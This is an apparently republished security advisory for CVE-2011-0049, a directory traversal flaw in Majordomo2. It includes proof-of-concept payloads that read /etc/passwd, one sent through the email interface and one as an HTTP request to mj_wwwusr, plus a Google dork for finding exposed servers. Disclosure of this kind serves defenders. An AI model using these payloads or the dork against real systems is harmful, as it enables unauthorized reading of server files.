Majordomo2 - Directory Traversal (SMTP/HTTP)

2011.02.05
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Original Advisory: https://sitewat.ch/en/Advisory/View/1 Credit: Michael Brooks (https://sitewat.ch) Vulnerability: Directory Traversal Software: Majordomo2 Identifier:CVE-2011-0049 Vendor: http://www.mj2.org/ Affected Build: 20110121 and prior Google dork:inurl:mj_wwwusr Special thanks to Dave Miller, Reed Loden and the rest of the Mozilla security team for handling the issue. This vulnerability is exploitable via ALL of Majordomo2's interfaces. *Including e-mail*. Send an email to majordomo's mail interface (for example: majordomo@bugzilla.org) with the body of the message as follows: help ../../../../../../../../../../../../../etc/passwd I'll give you one guess as to the contents of the response email ;). PoC for HTTP: http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd

References:

https://bugzilla.mozilla.org/show_bug.cgi?id=628064
https://bugzilla.mozilla.org/show_bug.cgi?id=628064
https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481
https://sitewat.ch/en/Advisory/View/1
http://xforce.iss.net/xforce/xfdb/65113
http://www.securityfocus.com/bid/46127
http://www.securityfocus.com/archive/1/archive/1/516150/100/0/threaded
http://www.exploit-db.com/exploits/16103
http://secunia.com/advisories/43125


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top